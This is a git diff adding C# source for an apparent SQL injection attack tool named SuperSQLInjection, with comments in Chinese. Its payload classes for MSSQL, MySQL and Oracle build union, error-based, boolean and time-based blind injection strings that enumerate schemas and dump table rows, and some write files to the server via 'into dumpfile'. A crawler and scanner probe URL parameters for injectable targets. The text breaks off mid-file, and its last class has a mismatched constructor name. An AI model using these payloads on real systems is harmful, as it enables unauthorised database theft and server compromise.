+ //读文件的的payload
+ public static String file_content = "(select data from ssqlinjection)";
+
+
+
+ ///
+ /// 获取union的payload
+ ///
+ /// 列长
+ /// 显示列
+ /// 填充
+ /// 数据库名
+ /// 表名
+ /// 获取数据的字段
+ /// 第几行数据,1开始
+ public static String getUnionDataValue(int columnsLen,int showIndex,int Fill,String dbname,String table,List columns,int index)
+ {
+ StringBuilder sb = new StringBuilder();
+ String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
+ for (int i = 1; i <= columnsLen; i++)
+ {
+
+ if (i == showIndex)
+ {
+ String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString());
+ sb.Append("(char(94)+char(94)+char(33)+cast(" + d + " as varchar(8000))+char(33)+char(94)+char(94)),");
+ }
+ else
+ {
+
+ sb.Append(Fill + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+ ///
+ ///
+ /// 列长
+ /// 显示列
+ /// 填充
+ /// 值payload
+ ///
+ public static String getUnionDataValue(int columnsLen, int showIndex, int Fill,String dataPayLoad)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append("(char(94)+char(94)+char(33)+" + "cast(" + dataPayLoad + " as varchar(8000))+char(33)+char(94)+char(94)),");
+ }
+ else
+ {
+ sb.Append(Fill + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+ public static String getUnionDataValueByCMD(int columnsLen, int showIndex, String dataPayLoad)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append("(char(94)+char(94)+char(33)+cast(" + (dataPayLoad) + " as varchar(8000))+char(33)+char(94)+char(94)),");
+ }
+ else
+ {
+ sb.Append("1,");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+ ///
+ /// 获取数据,error
+ ///
+ /// 列长
+ /// 显示列
+ /// 填充
+ ///
+ /// 数据库名
+ /// 表名
+ /// 第几行数据,1开始
+ ///
+ public static String getUnionDataValue(int columnsLen, int showIndex, int Fill, String dataPayLoad,String dbname,String table,String index)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append("(char(94)+char(94)+char(33)+" + (("cast(" + dataPayLoad + " as varchar(5000))").Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "+char(33)+char(94)+char(94)),");
+ }
+ else
+ {
+ sb.Append(Fill + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+
+ ///
+ /// 调用前需调用setDataValue方法
+ ///
+ /// 列长
+ /// 显示列
+ /// 填充
+ /// 数据库名
+ /// 表名
+ /// 获取数据的字段
+ /// 第几行数据,1开始
+ public static String getErrorDataValue(String dbname, String table,int index,List columns)
+ {
+ String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
+ String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{column}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString());
+ return error_value.Replace("{data}", d);
+ }
+
+ ///
+ /// 多字段拼接
+ ///
+ ///
+ ///
+ public static String concatAllColumns(List columns)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (String column in columns)
+ {
+ sb.Append(column);
+ sb.Append(",");
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return sb.ToString();
+ }
+ ///
+ /// 多字段拼接,带连接符
+ ///
+ ///
+ ///
+ public static String concatAllColumnsByConcatStr(List columns)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (String column in columns)
+ {
+
+ sb.Append("cast(isnull(" + column + ",0x20) as varchar(5000))+char(36)+char(36)+char(36)+");
+ }
+ sb.Remove(sb.Length - 28, 28);
+ return sb.ToString();
+ }
+
+
+ ///
+ /// 值的长度
+ ///
+ ///
+ ///
+ public static String getBoolLengthPayLoad(String dataStr,int len)
+ {
+
+ bool_length.Replace("{data}",unicode_value.Replace("{data}", dataStr)).Replace("{len}",len.ToString());
+
+ return dataStr;
+ }
+
+ ///
+ /// 获得bool方式值payload
+ ///
+ /// 对应值的查询SQL
+ /// 数据库名
+ /// 表名
+ /// 下标
+ ///
+ public static String getBoolDataPayLoad(String column,List columns,String dbName,String table,int index)
+ {
+ String data = data_value.Replace("{data}", "cast(isnull("+column+",0x20) as varchar)").Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
+ String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
+ return payload;
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/payload/MySQL5.cs b/SuperSQLInjection/payload/MySQL5.cs
new file mode 100644
index 0000000..d8e63da
--- /dev/null
+++ b/SuperSQLInjection/payload/MySQL5.cs
@@ -0,0 +1,282 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using tools;
+
+namespace SuperSQLInjection.payload
+{
+ class MySQL5
+ {
+ //加载对应配置(需要读取的环境变量)
+ public static String path = "config/mysql5/ver.txt";
+ public static List vers = FileTool.readFileToList(path);
+
+ public static String char_length = "(select char_length({data}))";
+
+ //数据库数量
+ public static String dbs_count = "(select count(*) from information_schema.schemata)";
+ //表数量
+ public static String tables_count = "(select count(*) from information_schema.tables where table_schema='{dbname}')";
+ //列数量
+ public static String columns_count = "(select count(*) from information_schema.columns where table_schema='{dbname}' and table_name='{table}')";
+
+
+ //获取数据库名
+ public static String db_value = "(select schema_name from information_schema.schemata limit {index},1)";
+ //获取表名称
+ public static String table_value = "(select table_name from information_schema.tables where table_schema='{dbname}' limit {index},1)";
+ //获取列名称
+ public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
+
+
+
+ public static String bool_length = "char_length({data})";
+ public static String bool_value = "ascii(mid({data},{index},1))";
+
+
+ //获取数据库数量bool方式
+ public static String bool_db_count = " and " + dbs_count + ">{len}";
+
+ //获取表数量bool
+ public static String bool_tables_count = " and " + tables_count + ">{len}";
+
+ //获取列数量bool
+ public static String bool_columns_count = " and " + columns_count + ">{len}";
+
+
+ //多字符长度判断
+ public static String mu_value = "(hex(convert((mid({data},{index},1)) using UTF8)))";
+
+ //bool方式字符长度判断
+ public static String ver_length = " and "+ bool_length + ">{len}";
+ //bool方式获取值
+ public static String ver_value = " and "+ bool_value + ">{len}";
+
+ //获取行数据bool
+ public static String data_value = "(select {columns} from {dbname}.{table} limit {limit},1)";
+
+
+
+ //union获取数据条数
+ public static String data_count = "(select count(*) from {dbname}.{table})";
+ //bool判断数据条数
+ public static String bool_datas_count = " and " + data_count + ">={len}";
+
+ //union获取值
+ public static String union_value = " and 1=2 union all select {data}";
+
+ //error方式
+ public static String error_value = " or (select 1 from (select count(*),concat(({data}),floor(rand(0)*2))x from information_schema.tables group by x)a)";
+
+ public static String hex = "(select hex({data}))";
+ public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
+ public static String substr_value = "(select substr({data},{start},{len}))";
+ public static String getBoolCountBySleep(String data,int maxTime)
+ {
+ return " AND (SELECT * FROM (SELECT(SLEEP("+ maxTime + "-(IF(("+data+ ">{len}), 0, " + maxTime + ")))))"+Tools.RandStr(4)+")";
+ }
+
+ ///
+ /// 生成联合查询的列的字符串,如1,2,3,用于union注入
+ ///
+ /// 列长度
+ /// 显示列是第几列
+ /// 其他列填充字符
+ /// 填充显示列的对应列集合数据
+ /// 表明
+ /// 数据库名
+ /// limit下标,没有填写-1
+ ///
+ public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, String fill, List columns, String table, String dbName, int limit)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+
+ if (i == showIndex)
+ {
+ sb.Append(creatMySQLColumnStr(columns) + ",");
+ }
+ else
+ {
+
+ sb.Append(fill + ",");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1).ToString();
+
+ if (!Tools.checkEmpty(dbName))
+ {
+ sb.Append(" from " + dbName + ".");
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(table);
+ }
+
+ }
+ else
+ {
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(" from " + table);
+ }
+ }
+ if (limit >= 0)
+ {
+ sb.Append(" limit " + limit + ",1");
+
+ }
+ return sb.ToString();
+ }
+
+ public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String data)
+ {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 1; i <= columnsLen; i++)
+ {
+
+ if (i == showIndex)
+ {
+ sb.Append(creatMySQLColumnStr(data) + ",");
+ }
+ else
+ {
+
+ sb.Append("1,");
+ }
+ }
+ return sb.Remove(sb.Length - 1, 1).ToString();
+ }
+
+ public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex, String path,String content)
+ {
+ StringBuilder sb = new StringBuilder(" union select ");
+ for (int i = 1; i <= columnsLen; i++)
+ {
+
+ if (i == dataIndex)
+ {
+ sb.Append(Tools.strToHex(content,"UTF-8")+",");
+ }
+ else
+ {
+
+ sb.Append("1,");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ sb.Append(" into dumpfile '"+path+"'");
+ return sb.ToString();
+ }
+
+ public static String creatMySQLWriteFileByUnionByMuSQL(String path, String content)
+ {
+ return ";select " + Tools.strToHex(content,"UTF-8") + " into outfile '" + path + "'";
+ }
+
+ public static String creatMySQLColumnsStrByError(List columns, String table, String dbName, int limit)
+ {
+ StringBuilder sb = new StringBuilder();
+ sb.Append(creatMySQLColumnStr(columns));
+
+ if (!Tools.checkEmpty(dbName))
+ {
+ sb.Append(" from " + dbName + ".");
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(table);
+ }
+ }
+ else
+ {
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(" from " + table);
+ }
+ }
+ if (limit >= 0)
+ {
+ sb.Append(" limit " + limit + ",1");
+
+ }
+ return sb.ToString();
+ }
+
+
+ public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit)
+ {
+ StringBuilder sb = new StringBuilder();
+ sb.Append(creatMySQLColumnStr(column));
+
+ if (!Tools.checkEmpty(dbName))
+ {
+ sb.Append(" from " + dbName + ".");
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(table);
+ }
+ }
+ else
+ {
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(" from " + table);
+ }
+ }
+ if (limit >= 0)
+ {
+ sb.Append(" limit " + limit + ",1");
+
+ }
+ return sb.ToString();
+ }
+
+
+
+ ///
+ /// 生成查询列数据
+ ///
+ /// 列明
+ ///
+ public static String creatMySQLColumnStr(List columns)
+ {
+ StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
+ for (int i = 0; i < columns.Count; i++)
+ {
+ if (columns.Count > 1)
+ {
+ sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,");
+ }
+ else
+ {
+ return creatMySQLColumnStr(columns[i]);
+ }
+
+ }
+
+ if (columns.Count > 1)
+ {
+ sb.Remove(sb.Length - 9, 9);
+ }
+ sb.Append("0x215e5e)");
+ return sb.ToString();
+
+ }
+
+
+ ///
+ /// 生成查询列数据
+ ///
+ /// 列明
+ ///
+ public static String creatMySQLColumnStr(String column)
+ {
+ StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
+ sb.Append(column);
+ sb.Append(",0x215e5e)");
+ return sb.ToString();
+
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/payload/Oracle.cs b/SuperSQLInjection/payload/Oracle.cs
new file mode 100644
index 0000000..a667955
--- /dev/null
+++ b/SuperSQLInjection/payload/Oracle.cs
@@ -0,0 +1,179 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using tools;
+
+namespace SuperSQLInjection.payload
+{
+ class Oracle
+ {
+ //加载对应配置(需要读取的环境变量)
+ public static String path = "config/oracle/ver.txt";
+ public static List vers = FileTool.readFileToList(path);
+
+
+ public static String err_hex_len = "(select length(rawtohex({data})) from dual)";
+
+ //数据库数量
+ public static String dbs_count = "(select count(distinct(owner)) from sys.all_tables)";
+ //表数量
+ public static String tables_count = "(select count(*) from sys.all_tables where owner='{dbname}')";
+ //列数量
+ public static String columns_count = "(select count(*) from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')";
+
+
+ //获取数据库名
+ public static String db_value = "(select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit={index})";
+ //获取表名称
+ public static String table_value = "(select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='{dbname}')) where limit={index})";
+ //获取列名称
+ public static String column_value = "(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')) where limit={index})";
+
+
+
+
+
+ //获取数据库数量bool方式
+ public static String bool_db_count = " and " + dbs_count + ">{len}";
+ //获取表数量bool
+ public static String bool_tables_count = " and " + tables_count + ">{len}";
+ //获取列数量bool
+ public static String bool_columns_count = " and " + columns_count + ">{len}";
+
+
+
+ public static String substr = "substr(({data})),{index},1)";
+ //多字节
+ public static String hex_value = "rawtohex(substr({data},{index},1))";
+
+ //bool方式字符长度判断
+ public static String bool_length = " and length({data})>{len}";
+
+ //bool方式获取值
+ public static String bool_value = " and ascii(substr({data},{index},1))>{len}";
+
+ //获取行数据
+ public static String data_value = "(select {data} from (select {allcolumns},rownum as limit from (select * from {dbname}.{table})) where limit={index})";
+
+
+ //union获取数据条数
+ public static String union_data_count = "(select count(*) from {dbname}.{table})";
+ public static String bool_datas_count = " and " + union_data_count + ">={len}";
+
+ //union获取值
+ public static String union_value = " and 1=2 union all select {data} from dual";
+
+ //error方式
+ public static String error_value = " and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex(cast(({data}) as varchar(256)))||chr(58)||chr(45)||chr(45)||chr(62))) from dual)";
+
+ public static String substr_error_value = " and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||substr(rawtohex(cast(({data}) as varchar(256))),{start},{len})||chr(58)||chr(45)||chr(45)||chr(62))) from dual)";
+
+ public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
+ {
+ StringBuilder sb = new StringBuilder();
+
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append("(chr(94)||chr(94)||chr(33)||"+dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index) + "||chr(33)||chr(94)||chr(94)),");
+ }
+ else
+ {
+ sb.Append("null,");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+ public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index)
+ {
+ StringBuilder sb = new StringBuilder();
+ String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
+ for (int i = 1; i <= columnsLen; i++)
+ {
+ if (i == showIndex)
+ {
+ sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index));
+ sb.Append(",");
+ }
+ else
+ {
+ sb.Append("null,");
+ }
+ }
+ sb.Remove(sb.Length - 1, 1);
+ return union_value.Replace("{data}", sb.ToString());
+ }
+
+ public static String getErrorDataValue(String dataPayLoad, String dbname, String table, String index)
+ {
+ String data=dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index);
+ return error_value.Replace("{data}", data);
+ }
+
+
+
+ public static String getErrorDataLen(List columns, String dbname, String table, String index)
+ {
+ return err_hex_len.Replace("{data}", getDataValue(columns, dbname, table, index));
+ }
+
+ public static String unionCastColumns(List columns, String unionStr)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (String column in columns)
+ {
+
+ sb.Append("cast(" + column + " as varchar(4000))" +unionStr);
+ }
+ sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
+ return sb.ToString();
+ }
+
+ ///
+ /// 值的长度
+ ///
+ ///
+ ///
+ public static String getBoolLengthPayLoad(String dataStr, int len)
+ {
+
+ bool_length.Replace("{data}", hex_value.Replace("{data}", dataStr)).Replace("{len}", len.ToString());
+
+ return dataStr;
+ }
+
+ ///
+ /// 获得bool方式值payload
+ ///
+ /// 对应值的查询SQL
+ /// 数据库名
+ /// 表名
+ /// 下标
+ ///
+ public static String getBoolDataPayLoad(String column,String orderby,String dbName, String table, int index)
+ {
+ String data = setDataValue(column, orderby);
+ String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
+ return payload;
+ }
+
+ private static String setDataValue(String allColumns, String orderby)
+ {
+ return data_value.Replace("{allcolumns}", allColumns);
+ }
+
+ public static String getDataValue(List columns, String dbName, String table, String index)
+ {
+ StringBuilder sb = new StringBuilder();
+ String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
+ sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
+ sb.Append(",");
+ sb.Remove(sb.Length - 1, 1);
+ return sb.ToString();
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/scan/Spider.cs b/SuperSQLInjection/scan/Spider.cs
new file mode 100644
index 0000000..72826a7
--- /dev/null
+++ b/SuperSQLInjection/scan/Spider.cs
@@ -0,0 +1,146 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using SuperSQLInjection.model;
+using SuperSQLInjection.tools;
+using tools;
+using model;
+using System.Text.RegularExpressions;
+using System.Threading;
+using System.Collections;
+
+namespace SuperSQLInjection.scan
+{
+ class Spider
+ {
+
+ public List AllURL = new List();
+ public List AllNoParamaValURL = new List();//用于去掉相似URL
+ public static Config config=null;
+ public static String reqestGetTemplate = "GET {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nHost: {host}";
+ public static String reqestPOSTTemplate = "POST {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nHost: {host}\r\n\r\n{data}";
+ public void findLinks(String url)
+ {
+ try
+ {
+ if (url.IndexOf("https") != -1)
+ {
+ config.useSSL = true;
+ }
+ else {
+ config.useSSL = false;
+ }
+ ServerInfo sever = URLTools.getHostAndPathQueryByURL(url);
+ Uri uri = new Uri(url);
+ String crequest = reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port);
+
+ String rootPath = "";
+ if (("http".Equals(uri.Scheme) && uri.Port == 80) || ("https".Equals(uri.Scheme) && uri.Port == 443))
+ {
+
+ rootPath = uri.Scheme + "://" + uri.Host;
+ }
+ else
+ {
+ rootPath = uri.Scheme + "://" + uri.Host + ":" + uri.Port;
+ }
+ ServerInfo urlServer = sendHTTP(url.StartsWith("https",StringComparison.OrdinalIgnoreCase),sever.host, sever.port, crequest);
+
+ String rootHost = Tools.getRootDomain(uri.Host);
+ //当前URL目录
+ String cpath = rootPath + Tools.getCurrentPath(uri.AbsolutePath);
+ int count = 0;
+ if (urlServer != null)
+ {
+ //抓取连接+*
+ //Thread.Sleep(200);
+ Match m;
+ Regex reg = new Regex("href=(['\"\\S]?)(?[^'\"]*)", RegexOptions.IgnoreCase);
+ if (urlServer.code == 200 && urlServer.body.Length > 10)
+ {
+ for (m = reg.Match(urlServer.body); m.Success; m = m.NextMatch())
+ {
+ String curl = m.Groups["href"].Value;
+ if (!String.IsNullOrEmpty(curl))
+ {
+ if (!curl.Contains("?") || !curl.Contains("="))
+ {
+ continue;
+ }
+
+ if (curl.ToLower().Contains("javascript:"))
+ {
+ continue;
+ }
+ if (!curl.Contains(".") && !curl.Contains("/"))
+ {
+ continue;
+ }
+ if (curl.Contains(".css") || curl.Contains(".js") || curl.Contains(".jpg") || curl.Contains(".png") || curl.Contains(".ico") || curl.Contains(".gif"))
+ {
+ continue;
+ }
+ curl = curl.Replace("&", "&");
+ if (curl.StartsWith("//"))
+ {
+
+ curl = "http:" + curl;
+
+ }
+ else if (curl.StartsWith("/"))
+ {
+
+ curl = rootPath + curl;
+
+ }
+ else if (curl.IndexOf("http://") == -1 && curl.IndexOf("www.") == -1 && curl.IndexOf(".com") == -1 && curl.IndexOf(".cn") == -1 && curl.IndexOf(".tw") == -1 && curl.IndexOf(".jp") == -1)
+ {
+ //相对路径
+
+ curl = cpath + curl;
+ }
+
+ if (curl.IndexOf(">")!=-1) {
+ curl = curl.Substring(0, curl.IndexOf(">"));
+ }
+
+ if (curl.Contains(rootHost))
+ {
+ //过滤相似URL
+ String noValURL = Tools.clearURLParams(curl);
+ try
+ {
+ Uri cu = new Uri(curl);
+ if (!AllURL.Contains(curl) && !AllNoParamaValURL.Contains(noValURL)&&AllURL.Count jumpkeyList = FileTool.readFileToList("config/injection/jumpkey.txt");
+ //错误注入关键字目录
+ public static List errorDBList = FileTool.readAllDic("config/injection/error/");
+ //盲注payload
+ public static List bool_payloads = FileTool.readFileToList("config/injection/injection.txt");
+ public static List errer_code = new List();
+
+ public static void addErrorCode()
+ {
+
+ errer_code.Add("501");
+ errer_code.Add("503");
+ errer_code.Add("403");
+ errer_code.Add("502");
+ errer_code.Add("400");
+ errer_code.Add("401");
+ errer_code.Add("0");
+ }
+
+ public static Injection testInjection(String url, Config config, Boolean justScanError)
+ {
+
+ Injection injection = new Injection();
+ try
+ {
+
+ int index = url.IndexOf('?');
+ if (index == -1)
+ {
+
+ return injection;
+ }
+ injection.url = url;
+ String testUrl = Uri.EscapeUriString(url);
+
+ Uri uri = new Uri(url);
+ bool isSSL = url.StartsWith("https", StringComparison.OrdinalIgnoreCase);
+ string queryString = (uri.Query != null && uri.Query.Length > 0) ? uri.Query.Substring(1, uri.Query.Length - 1) : "";
+
+ String[] strparams = queryString.Split('&');
+ int timeout = 0;//超时5次,认为此URL为坏死URL
+ //对参数进行注入测试
+ foreach (String param in strparams)
+ {
+ if (timeout >= 5)
+ {
+ break;//超时5次,认为此URL为坏死URL
+ }
+ if (param.IndexOf("=") == -1) {
+ continue;
+ }
+ String[] sprarm = param.Split('=');
+
+ String pramName = sprarm[0];
+ if (jumpkeyList.Contains(pramName))
+ {
+ continue;//忽略扫描参数
+ }
+ if (sprarm.Length <= 1)
+ {
+ continue;
+ }
+ String pramValue = sprarm[1];
+ String payload = param + "%27";
+ String curl = uri.PathAndQuery.Replace(param, payload);
+ injection.testUrl = testUrl.Replace(param, payload);
+ injection.paramName = sprarm[0];
+ String oldrequest = Spider.reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port);
+ String request = Spider.reqestGetTemplate.Replace("{url}", curl).Replace("{host}", uri.Host + ":" + uri.Port);
+ //通过错误显示判断
+
+ ServerInfo errorDBServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, payload, request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet);
+ if (errorDBServer.runTime > config.timeOut * 1000) timeout++;
+ if (errorDBServer.runTime > config.timeOut) timeout++;
+
+ if (errorDBServer.body.Length == 0 | errorDBServer.code == 404)
+ {
+ continue;
+ }
+
+ foreach (String eop in errorDBList)
+ {
+ List errorKeys = FileTool.readFileToList("config/injection/error/" + eop);
+ foreach (String key in errorKeys)
+ {
+ bool find = Regex.IsMatch(errorDBServer.body, key, RegexOptions.IgnoreCase);
+ if (find)
+ {
+ injection.isInjection = true;
+ injection.dbType = (eop.Replace(".txt", ""));
+ injection.payload = "'";
+ injection.remark = "错误显示信息判断";
+ injection.injectType = "错误显示";
+ injection.dbType = eop;
+ return injection;
+ }
+ }
+ }
+ if (!injection.isInjection && justScanError == false)
+ {
+
+ //读取bool payload
+ ServerInfo oserver = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, "获取原始页面内容", oldrequest, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet);
+ if (oserver.runTime > config.timeOut * 1000) timeout++;
+
+ if (bool_payloads.Count > 0)
+ {
+
+ foreach (String bool_payload in bool_payloads)
+ {
+ String[] bool_ps = bool_payload.Split(':');
+
+ String flasePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[1]);
+ String falseURL = uri.PathAndQuery.Replace(param, flasePayload);
+ injection.paramName = sprarm[0];
+ injection.testUrl = testUrl.Replace(param, flasePayload);
+
+ String falserequest = Spider.reqestGetTemplate.Replace("{url}", falseURL).Replace("{host}", uri.Host + ":" + uri.Port);
+ ServerInfo falseServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, flasePayload, falserequest, config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet);
+ if (falseServer.runTime > config.timeOut * 1000) timeout++;
+ decimal pfalse = Tools.getLike(oserver.body, falseServer.body);
+ //静态参数
+ if (pfalse > 99)
+ {
+ continue;
+ }
+
+ String truePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[0]);
+ String trueURL = uri.PathAndQuery.Replace(param, truePayload);
+ String truerequest = Spider.reqestGetTemplate.Replace("{url}", trueURL).Replace("{host}", uri.Host + ":" + uri.Port);
+
+ ServerInfo trueServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, truePayload, truerequest, config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet);
+ if (trueServer.runTime > config.timeOut*1000) timeout++;
+ //计算相似度
+ decimal ptrue = Tools.getLike(oserver.body, trueServer.body);
+ if (ptrue < 85)
+ {
+ continue;
+ }
+ if (oserver.runTime > config.timeOut) timeout++;
+ injection.payload = bool_ps[1];
+ injection.injectType = bool_ps[2];
+ injection.dbType = "未知";
+
+ if (oserver.code != 404 && !errer_code.Contains(oserver.code.ToString()) && !errer_code.Contains(trueServer.code.ToString()) && !errer_code.Contains(falseServer.code.ToString()) && trueServer.body.Length > 0 && falseServer.body.Length > 0)
+ {
+
+ //判断存在bool盲注
+ //根据状态码判断
+ if (oserver.code == trueServer.code && trueServer.code != falseServer.code)
+ {
+ injection.isInjection = true;
+ injection.remark = "状态码判断----" + oserver.code + "|" + trueServer.code + "|" + falseServer.code;
+ return injection;
+ }
+
+ if (falseServer.body.Length < trueServer.body.Length)
+ {
+ /*
+ if (ptrue > pfalse)
+ {
+
+ injection.isInjection = true;
+ injection.remark = "动态响应长度判断,相似度----" + ptrue + "|" + pfalse + "|" + p + "%";
+ return injection;
+ }*/
+
+
+ if (ptrue == 100)
+ {
+
+ if (ptrue > pfalse)
+ {
+ injection.isInjection = true;
+ injection.remark = "固定长度,相似度--false|true--" + pfalse + "|" + ptrue + "%";
+ return injection;
+ }
+ }
+ else {
+
+ ServerInfo true1Server = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, truePayload, truerequest.Replace("1%3d1", "2%3d2"), config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet);
+ if (true1Server.runTime > config.timeOut * 1000) timeout++;
+ decimal p = Tools.getLike(oserver.body, true1Server.body);
+ if (ptrue-pfalse>= 2 && Math.Abs(p - pfalse) >= 2)
+ {
+ injection.isInjection = true;
+ injection.remark = "动态长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "|" + p + "%";
+ return injection;
+ }
+
+
+ }
+
+
+ }
+
+
+ }
+
+ }
+ }
+
+ }
+
+
+ }
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("判断注入发生异常!" + e.Message);
+ }
+ return injection;
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/tools/LikeMath.cs b/SuperSQLInjection/tools/LikeMath.cs
new file mode 100644
index 0000000..9b8d2d4
--- /dev/null
+++ b/SuperSQLInjection/tools/LikeMath.cs
@@ -0,0 +1,144 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.tools
+{
+ public class LikeMath
+ {
+ ///
+ /// 指定按照哪个列排序
+ ///
+ private int ColumnToSort;
+ /**/
+ ///
+ /// 指定排序的方式
+ ///
+ private SortOrder OrderOfSort;
+ /**/
+ ///
+ /// 声明CaseInsensitiveComparer类对象,
+ /// 参见ms-help://MS.VSCC.2003/MS.MSDNQTR.2003FEB.2052/cpref/html/frlrfSystemCollectionsCaseInsensitiveComparerClassTopic.htm
+ ///
+ private CaseInsensitiveComparer ObjectCompare;
+
+ /**/
+ ///
+ /// 构造函数
+ ///
+ public ListViewColumnSorter()
+ {
+ // 默认按第一列排序
+ ColumnToSort = 0;
+
+ // 排序方式为不排序
+ OrderOfSort = SortOrder.None;
+
+ // 初始化CaseInsensitiveComparer类对象
+ ObjectCompare = new CaseInsensitiveComparer();
+ }
+
+ /**/
+ ///
+ /// 重写IComparer接口.
+ ///
+ /// 要比较的第一个对象
+ /// 要比较的第二个对象
+ /// 比较的结果.如果相等返回0,如果x大于y返回1,如果x小于y返回-1
+ public int Compare(object x, object y)
+ {
+ int compareResult;
